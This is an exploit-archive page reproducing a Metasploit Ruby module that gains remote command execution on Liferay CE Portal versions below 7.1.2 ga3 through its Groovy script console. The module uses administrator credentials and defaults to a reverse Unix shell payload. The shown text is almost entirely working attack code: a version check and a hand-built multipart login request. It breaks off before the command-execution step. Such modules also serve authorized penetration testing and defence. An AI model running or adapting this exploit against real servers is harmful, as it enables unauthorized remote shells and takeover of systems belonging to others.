Exploits / Vulnerability Discovered : 2019-03-11 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Liferay ce portal < 7.1.2 ga3 remote command execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Liferay CE Portal Tomcat < 7.1.2 ga3 - Groovy-Console Remote Command Execution',
'Description' => %q{
This module uses the Liferay CE Portal Groovy script console to execute
OS commands. The Groovy script can execute commands on the system via a [command].execute() call.
Valid credentials for an application administrator user account are required
This module has been tested successfully with Liferay CE Portal Tomcat 7.1.2 ga3 on Debian 4.9.18-1kali1 system.
},
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://pentest.com.tr/exploits/Liferay-CE-Portal-Tomcat-7-1-2-ga3-Groovy-Console-Remote-Command-Execution-Metasploit.html' ],
],
'Privileged' => false,
'Platform' => [ 'unix' ],
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'reverse perl ruby python',
}
},
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Liferay CE Portal Tomcat < 7.1.2 ga3', { }]
],
'DisclosureDate' => 'March 08, 2019',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username', ]),
OptString.new('PATH', [ true, 'The URI path of the portal', '/' ]),
], self.class)
end
##
# Version and Vulnerability Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
version = res.headers['Liferay-Portal']
print_status("Target: #{version}")
if res and res.code == 200 and version =~ /Portal 7./ or version =~ /Portal 6./
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Returns the SSL, Host and Port as a string
##
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def exploit
##
# Login and cookie information gathering
##
print_status('Attempting to login with specified user...')
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_formDate\"\r\n\r\n"
data << ""
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_saveLastPath\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_redirect\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_login\"\r\n\r\n"
data << "#{datastore['USERNAME']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_password\"\r\n\r\n"
data << "#{datastore['PASSWORD']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_checkboxNames\"\r\n\r\nrememberMe\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
data << "#{authtoken}"
data << "\r\n-----------------------------{boundary}--\r\n"